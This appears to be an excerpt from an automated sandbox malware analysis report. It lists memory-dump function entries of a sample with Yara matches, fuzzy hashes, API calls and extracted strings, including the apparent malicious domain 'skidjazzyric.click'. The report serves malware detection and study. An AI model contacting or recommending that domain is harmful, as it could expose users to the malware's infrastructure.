                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5230$I`af$t]ae
                                                                        • API String ID: 0-812676372
                                                                        • Opcode ID: 99ad52d241a312d1886458a9d982083b732080c3046440976dde46d31c833c5f
                                                                        • Instruction ID: bfdb4628cf08319da1e8c9cae4ac1b8349d3cba4974f31be754cb04b11ccd381
                                                                        • Opcode Fuzzy Hash: 99ad52d241a312d1886458a9d982083b732080c3046440976dde46d31c833c5f
                                                                        • Instruction Fuzzy Hash: 06513872A59B808FD739CF65C891B67BBE3AB91308F19896DC1C287695DBB9E005C700
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 1$5230$A
                                                                        • API String ID: 0-2921844354
                                                                        • Opcode ID: 2f0b92b3633f1c98435bd7295618cc795514d651c00833ac90ced833c2e04a77
                                                                        • Instruction ID: e76a71f95e24524307293e01d01a6f58a23ad2f1a40c0433447d02162c8ae966
                                                                        • Opcode Fuzzy Hash: 2f0b92b3633f1c98435bd7295618cc795514d651c00833ac90ced833c2e04a77
                                                                        • Instruction Fuzzy Hash: F8416972A5C3405AE324AE65CC827ABB6D3EBD1324F18C93EF1D9472C5E9F848428316
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .$GetProcAddress.$l
                                                                        • API String ID: 0-2784972518
                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                        • Instruction ID: 3836c2c0c9d7d0588d79a54d7fb2a89bb352c49fe921cc1f55db2b8726cc0980
                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                        • Instruction Fuzzy Hash: 51314CB6940609DFDB11CF99C880AAEBBF6FF48324F15404AD445AB310D771EA45CFA4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NP,?$UA
                                                                        • API String ID: 0-2573221895
                                                                        • Opcode ID: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
                                                                        • Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
                                                                        • Opcode Fuzzy Hash: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
                                                                        • Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 9B$B
                                                                        • API String ID: 0-4208784936
                                                                        • Opcode ID: 986acf23185ab1b50e6ad9565e7f762b14932ce870d5dbc259a2a73c0999a18c
                                                                        • Instruction ID: b8962ee0846928653caa32ab1d9872d6313577c24d17d84896ac92dc99d0ed25
                                                                        • Opcode Fuzzy Hash: 986acf23185ab1b50e6ad9565e7f762b14932ce870d5dbc259a2a73c0999a18c
                                                                        • Instruction Fuzzy Hash: EF72B1B1619F808ED329CF3C8805397BFD6AB5A324F188B5EA0FA877D2C77561018756
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: {wBy$?;;
                                                                        • API String ID: 0-3800777323
                                                                        • Opcode ID: ae1563bb26e5b034f74fb841f5d8e6b326ce722d7a4ccc89e03eadf425dba48e
                                                                        • Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
                                                                        • Opcode Fuzzy Hash: ae1563bb26e5b034f74fb841f5d8e6b326ce722d7a4ccc89e03eadf425dba48e
                                                                        • Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: nz$nz
                                                                        • API String ID: 0-4002586851
                                                                        • Opcode ID: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
                                                                        • Instruction ID: a3c1cfee1f99e453375e064e447a228442ae2f14524e15aa7be5cf63e3ec65e5
                                                                        • Opcode Fuzzy Hash: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
                                                                        • Instruction Fuzzy Hash: ACE11872608B808FD315CA3CC891396FFE2AFDA314F1D866DC5EA8B392D675A406C715
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: nz$nz
                                                                        • API String ID: 0-4002586851
                                                                        • Opcode ID: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
                                                                        • Instruction ID: b96d90d77959f889999b0537ed4d75a76dec3588928b7040a84930a765161454
                                                                        • Opcode Fuzzy Hash: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
                                                                        • Instruction Fuzzy Hash: 99E1E872608B808FD315CA3CC8953A6BFE2AFDA310F1D866DC5EA8B396D775A405C711
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: UXY^$skidjazzyric.click
                                                                        • API String ID: 0-1204630608
                                                                        • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                        • Instruction ID: d4a14a9f2c2f0854964ffc34a88a484fd9aac6a31bc7c6ca58301aeff22ad83a
                                                                        • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                        • Instruction Fuzzy Hash: B79135B5504B418FD315CF2AC990622FBA2FF96300B188AACC0D24FB56C738E816CF95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: UXY^$skidjazzyric.click
                                                                        • API String ID: 0-1204630608
                                                                        • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                        • Instruction ID: 18482736283a343f1fb0fa3b1a6ff59a28e1ae85c8f36d2362c786941b6fe2e3
                                                                        • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                        • Instruction Fuzzy Hash: C79124B5604B818FD315CF29C990662FBA2FF96310B19869CC0D28FB56C779E806CF95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: o~$yr
                                                                        • API String ID: 0-1013308823
                                                                        • Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                        • Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
                                                                        • Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                        • Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: o~$yr
                                                                        • API String ID: 0-1013308823
                                                                        • Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                        • Instruction ID: 85bcade867c6439ad62c42de966f5e9959bccdd9b7a8c2c0fa0c535c0d162477
                                                                        • Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                        • Instruction Fuzzy Hash: 0F910376948360CBD320DF19C845A6BF7E2EFC5324F09896CE9D95B390E7B48506C786
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D`a&$NMNO
                                                                        • API String ID: 0-4143563191
                                                                        • Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                        • Instruction ID: 8711074b621ce6d33ea7818a800bb37f985eb24be711e7c8b93670b22d69b59e
                                                                        • Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                        • Instruction Fuzzy Hash: 4A8145312483459FD318DF28CC81A6BB7B2EFC5328F29C66CE5A547391DB32980A8751
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: :7$%$:7$%
                                                                        • API String ID: 0-2391988857
                                                                        • Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                        • Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
                                                                        • Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                        • Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: :7$%$:7$%
                                                                        • API String ID: 0-2391988857
                                                                        • Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                        • Instruction ID: 0b1ea415e5d89c5fc13626f38f01feea219ca3ee6d4e6243662c470e307adb95
                                                                        • Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                        • Instruction Fuzzy Hash: 4A21B0711183908BD7089F79C964B6FFBE5BB86318F145A2CE1E287291DBB4C409CB82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MO$MO
                                                                        • API String ID: 0-3148518880
                                                                        • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                        • Instruction ID: ada7f03b6c50977aac26abb729b58cc350a43aeaf28de1ebc885b32ed1e0ca40
                                                                        • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                        • Instruction Fuzzy Hash: C111AC741442818BEF158FA8DD91667BFA0EF42220F1499D8DC855F38BC738C502CF64
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7&'$$vA\
                                                                        • API String ID: 0-2621209329
                                                                        • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                        • Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
                                                                        • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                        • Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7&'$$vA\
                                                                        • API String ID: 0-2621209329
                                                                        • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                        • Instruction ID: efdb607a1660d8ffcbe142d58d6c96736b9a459e32251f01f438a566d8a283ef
                                                                        • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                        • Instruction Fuzzy Hash: 93F068745545944BDB918F3D98A96BE67F0E757214F202AB5C65AE32A2C731C4818F08
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL ref: 00411D64
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID:
                                                                        • API String ID: 237503144-0
                                                                        • Opcode ID: 7cd814f07503108b401f8375ab37499eb4f108dc70f145f49585bda23ac5c5ec
                                                                        • Instruction ID: a8cfc5bf14821c73dd49e5f1522f5c4ec20a02328b59693b871348f0b0df5eb8
                                                                        • Opcode Fuzzy Hash: 7cd814f07503108b401f8375ab37499eb4f108dc70f145f49585bda23ac5c5ec
                                                                        • Instruction Fuzzy Hash: E4420A71A04B408FD714DF38D9813A6BBE1AF95314F188A3ED5EB8B3D2D639A446C706
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /p
                                                                        • API String ID: 0-62938030
                                                                        • Opcode ID: f05dc9b10545ef86860d8fcbb8867fd065d1046c62c590d4d0da79f29562f858
                                                                        • Instruction ID: ba8b9978e2f20e60afdbbdaba48a15688935c3ff76d45a9363d37c1b9ca99bef
                                                                        • Opcode Fuzzy Hash: f05dc9b10545ef86860d8fcbb8867fd065d1046c62c590d4d0da79f29562f858
                                                                        • Instruction Fuzzy Hash: 7C32003AA18351CBD7049F39D81226BB7E1FF9A320F19887ED8C183291E779C955C786
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02147E61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID:
                                                                        • API String ID: 237503144-0
                                                                        • Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                        • Instruction ID: 3a460a3d24a496891c07117d74410d13a97f433dd945fac061e5922fc237dd37
                                                                        • Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                        • Instruction Fuzzy Hash: 1EB103729587218BC314CF28C4917AAF7F2FFD9314F19962CE8C95B294E7349902C795
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 021482CF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID:
                                                                        • API String ID: 237503144-0
                                                                        • Opcode ID: 63f8c36fe892800652800f2eb1c86de349cf38f6bbdc27b7255af2ab7d33a2e4
                                                                        • Instruction ID: 0e7401a5a8db240485299e8b60410263531a1f8e390c8874f1348c6c67633bcb
                                                                        • Opcode Fuzzy Hash: 63f8c36fe892800652800f2eb1c86de349cf38f6bbdc27b7255af2ab7d33a2e4
                                                                        • Instruction Fuzzy Hash: 3A91EE755083118BC728CF28C89176BB7E1FFC8714F0A8A5DE8C99B254EB389941CB46
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: Object
                                                                        • String ID:
                                                                        • API String ID: 2936123098-0
                                                                        • Opcode ID: 5bfd6ba3a5852fa2e976878255e20d7f7abe229613a7257217ba93b1cb630f99
                                                                        • Instruction ID: c3200330e68ce6aff19a63fed1a4000c560c1f69ed3aeb6105e6dfa3e47a6751
                                                                        • Opcode Fuzzy Hash: 5bfd6ba3a5852fa2e976878255e20d7f7abe229613a7257217ba93b1cb630f99
                                                                        • Instruction Fuzzy Hash: 9C91C3B1E042548FCB18CF6CC89179EBBF2AF89310F2982ADD855AB391D7759C01CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: J
                                                                        • API String ID: 0-1141589763
                                                                        • Opcode ID: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
                                                                        • Instruction ID: fda16036ad69fd6001319f3414ba3134900024cf57a0a68240a2308677c6b07d
                                                                        • Opcode Fuzzy Hash: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
                                                                        • Instruction Fuzzy Hash: 82127D71609AC18FE3158B38C591392BFE1AB66304F1CC9AEC4EACB387D63AD5068755
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: J
                                                                        • API String ID: 0-1141589763
                                                                        • Opcode ID: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
                                                                        • Instruction ID: d09dfe0080e912f47267e4aa1547875a1d0c84c588d92a0f9ed0156a713d7571
                                                                        • Opcode Fuzzy Hash: 5532c117ede87cb6d48dc4337908c912729bbac9ed68fbb5a41ad98824fdc125
                                                                        • Instruction Fuzzy Hash: FB127D75609AC18FE3158B38C895392BFE1AB66304F1CC9ADC4EACB387D63AD506C751
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: Object
                                                                        • String ID:
                                                                        • API String ID: 2936123098-0
                                                                        • Opcode ID: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
                                                                        • Instruction ID: 45239876aaa66c970168bcac432cbab02119562676560ecae2c3189c67bbcca7
                                                                        • Opcode Fuzzy Hash: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
                                                                        • Instruction Fuzzy Hash: 6571C7B1E046508FC718CF6CC851359BFF2AB99314F2982ADD8999F3D2D6759C06CB81
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Object
                                                                        • String ID:
                                                                        • API String ID: 2936123098-0
                                                                        • Opcode ID: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
                                                                        • Instruction ID: 50592425da8aaf6e3f04d998afa7d1c43289a2446ba810fe5000e7386c3f021d
                                                                        • Opcode Fuzzy Hash: 8c177a64a41d46644310acd39af35d0db7563ee412bdb5cae8b7e221a38126ae
                                                                        • Instruction Fuzzy Hash: AB71A4B1E046508FC718CF6CC855369BFE2AB85314F2982ADD8999B3D2D7759806CB81
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID:
                                                                        • API String ID: 2525500382-0
                                                                        • Opcode ID: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
                                                                        • Instruction ID: f2a30e19a756ef2febaf58aa14edd62971e43cb539abc4116fa3d4166735a6c9
                                                                        • Opcode Fuzzy Hash: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
                                                                        • Instruction Fuzzy Hash: 51913A21208BC28ED3268B3C88486157F915B67228F2C87DCE0FA8F7E7C6568107C366
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID:
                                                                        • API String ID: 2525500382-0
                                                                        • Opcode ID: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
                                                                        • Instruction ID: 2dd1a3e1bcfc0e7b93ee3318f9d1567f3827c7a38f5489ff2753a0a664db54cb
                                                                        • Opcode Fuzzy Hash: 895e7198797d061cd482444d9cbd8ead717cf4916029d31f9be37df0205ba546
                                                                        • Instruction Fuzzy Hash: AF912B11208BC28ED7268B3C88586157F915B67228B2D87DCD0FA8F7E7C7578507C366
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID:
                                                                        • API String ID: 2525500382-0
                                                                        • Opcode ID: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
                                                                        • Instruction ID: 615ca32909d59e4e98a0e547278d02967b49bf7f3b148c397c41720c4b96474d
                                                                        • Opcode Fuzzy Hash: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
                                                                        • Instruction Fuzzy Hash: EB912C11208BC28EC326CA3C88586557F921BA7228F2D87DDD0FA8F7D7C7669507C766
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID:
